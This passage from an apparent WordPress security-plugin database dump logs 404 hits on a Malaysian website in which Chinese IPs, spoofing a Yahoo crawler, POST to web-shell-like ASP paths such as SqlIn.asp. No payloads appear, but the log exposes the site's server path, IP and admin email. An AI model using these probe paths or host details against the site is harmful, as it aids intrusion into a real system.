15:22:20',35266928,37067072,'http://bintara.com.my//admin/djijc/index.asp',1,0,'210.26.172.7'),(28983,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//admin/djijc/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"222.59.210.235\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"222.59.210.235\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/admin/djijc/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/admin/djijc/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBmv5cHc@dX2BdZ47JNwAAABc\";s:12:\"REDIRECT_URL\";s:22:\"/admin/djijc/index.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"58369\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/admin/djijc/index.asp\";s:10:\"SCRIPT_URL\";s:22:\"/admin/djijc/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBmv5cHc@dX2BdZ47JNwAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930522.7509\";s:12:\"REQUEST_TIME\";s:10:\"1571930522\";}}','notice','2019-10-24 15:22:04','2019-10-24 15:22:03',35340408,37137992,'http://bintara.com.my//admin/djijc/index.asp',1,0,'222.59.210.235'),(28982,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//images/com1.dhsd.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.12.20.207\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.12.20.207\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/images/com1.dhsd.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/images/com1.dhsd.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBiqHtjB8Y0WvpqtvMAgAAAMs\";s:12:\"REDIRECT_URL\";s:21:\"/images/com1.dhsd.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"57993\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/images/com1.dhsd.asp\";s:10:\"SCRIPT_URL\";s:21:\"/images/com1.dhsd.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBiqHtjB8Y0WvpqtvMAgAAAMs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930507.0534\";s:12:\"REQUEST_TIME\";s:10:\"1571930507\";}}','notice','2019-10-24 15:21:48','2019-10-24 15:21:47',35266448,37059776,'http://bintara.com.my//images/com1.dhsd.asp',1,0,'210.12.20.207'),(28981,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//images/com1.dhsd.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"117.64.141.177\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"117.64.141.177\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/images/com1.dhsd.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/images/com1.dhsd.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBg@0MT698oQwhBK9gtwAAAQM\";s:12:\"REDIRECT_URL\";s:21:\"/images/com1.dhsd.asp\";s:11:\"REMOTE_ADDR\";s:12:\"110.87.25.73\";s:11:\"REMOTE_PORT\";s:5:\"57584\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/images/com1.dhsd.asp\";s:10:\"SCRIPT_URL\";s:21:\"/images/com1.dhsd.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBg@0MT698oQwhBK9gtwAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930499.7605\";s:12:\"REQUEST_TIME\";s:10:\"1571930499\";}}','notice','2019-10-24 15:21:42','2019-10-24 15:21:40',35344336,37143424,'http://bintara.com.my//images/com1.dhsd.asp',1,0,'117.64.141.177'),(28980,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//jq1/locale/toast.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"116.247.214.9\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"116.247.214.9\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/jq1/locale/toast.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/jq1/locale/toast.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBYd2Cd74l7secq5l1YQAAAVg\";s:12:\"REDIRECT_URL\";s:22:\"/jq1/locale/toast.ashx\";s:11:\"REMOTE_ADDR\";s:11:\"59.61.94.92\";s:11:\"REMOTE_PORT\";s:5:\"61206\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/jq1/locale/toast.ashx\";s:10:\"SCRIPT_URL\";s:22:\"/jq1/locale/toast.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBYd2Cd74l7secq5l1YQAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930466.0807\";s:12:\"REQUEST_TIME\";s:10:\"1571930466\";}}','notice','2019-10-24 15:21:09','2019-10-24 15:21:06',35270816,37072448,'http://bintara.com.my//jq1/locale/toast.ashx',1,0,'116.247.214.9'),(28979,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//jq1/locale/toast.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"121.33.49.11\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"121.33.49.11\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/jq1/locale/toast.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/jq1/locale/toast.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBW-5cHc@dX2BdZ47JJgAAAAQ\";s:12:\"REDIRECT_URL\";s:22:\"/jq1/locale/toast.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"56431\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/jq1/locale/toast.ashx\";s:10:\"SCRIPT_URL\";s:22:\"/jq1/locale/toast.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBW-5cHc@dX2BdZ47JJgAAAAQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930459.8141\";s:12:\"REQUEST_TIME\";s:10:\"1571930459\";}}','notice','2019-10-24 15:21:02','2019-10-24 15:21:00',35344936,37148808,'http://bintara.com.my//jq1/locale/toast.ashx',1,0,'121.33.49.11'),(28978,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//jq1/locale/toast.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.207.32.161\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.207.32.161\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/jq1/locale/toast.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/jq1/locale/toast.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBTv5cHc@dX2BdZ47JJQAAABU\";s:12:\"REDIRECT_URL\";s:22:\"/jq1/locale/toast.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"55652\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/jq1/locale/toast.ashx\";s:10:\"SCRIPT_URL\";s:22:\"/jq1/locale/toast.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBTv5cHc@dX2BdZ47JJQAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930446.8881\";s:12:\"REQUEST_TIME\";s:10:\"1571930446\";}}','notice','2019-10-24 15:20:50','2019-10-24 15:20:47',35663560,37460416,'http://bintara.com.my//jq1/locale/toast.ashx',1,0,'58.207.32.161'),(28977,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//cn/tousu/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"122.8.37.51\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"122.8.37.51\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/cn/tousu/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/cn/tousu/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBRv5cHc@dX2BdZ47JIgAAAAk\";s:12:\"REDIRECT_URL\";s:21:\"/cn/tousu/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"55652\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/cn/tousu/xiaying.asp\";s:10:\"SCRIPT_URL\";s:21:\"/cn/tousu/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBRv5cHc@dX2BdZ47JIgAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930438.8461\";s:12:\"REQUEST_TIME\";s:10:\"1571930438\";}}','notice','2019-10-24 15:20:40','2019-10-24 15:20:39',35265008,37067472,'http://bintara.com.my//cn/tousu/xiaying.asp',1,0,'122.8.37.51'),(28976,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"//cn/tousu/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"210.168.1.43\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"210.168.1.43\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/cn/tousu/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/cn/tousu/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBPP5cHc@dX2BdZ47JIAAAAA8\";s:12:\"REDIRECT_URL\";s:21:\"/cn/tousu/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"55652\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/cn/tousu/xiaying.asp\";s:10:\"SCRIPT_URL\";s:21:\"/cn/tousu/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBPP5cHc@dX2BdZ47JIAAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930428.4365\";s:12:\"REQUEST_TIME\";s:10:\"1571930428\";}}','notice','2019-10-24 15:20:30','2019-10-24 15:20:28',35336920,37135088,'http://bintara.com.my//cn/tousu/xiaying.asp',1,0,'210.168.1.43'),(28975,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"//images/temp/SqlIn.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"222.205.197.150\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"222.205.197.150\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"http://bintara.com.my/images/temp/SqlIn.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/images/temp/SqlIn.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbHBJ0q-QPicCh3WFsYnRQAAAJY\";s:12:\"REDIRECT_URL\";s:22:\"/images/temp/SqlIn.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"55355\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"http://bintara.com.my/images/temp/SqlIn.asp\";s:10:\"SCRIPT_URL\";s:22:\"/images/temp/SqlIn.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbHBJ0q-QPicCh3WFsYnRQAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571930408.0642\";s:12:\"REQUEST_TIME\";s:10:\"1571930408\";}}','notice','2019-10-24 15:20:10','2019-10-24 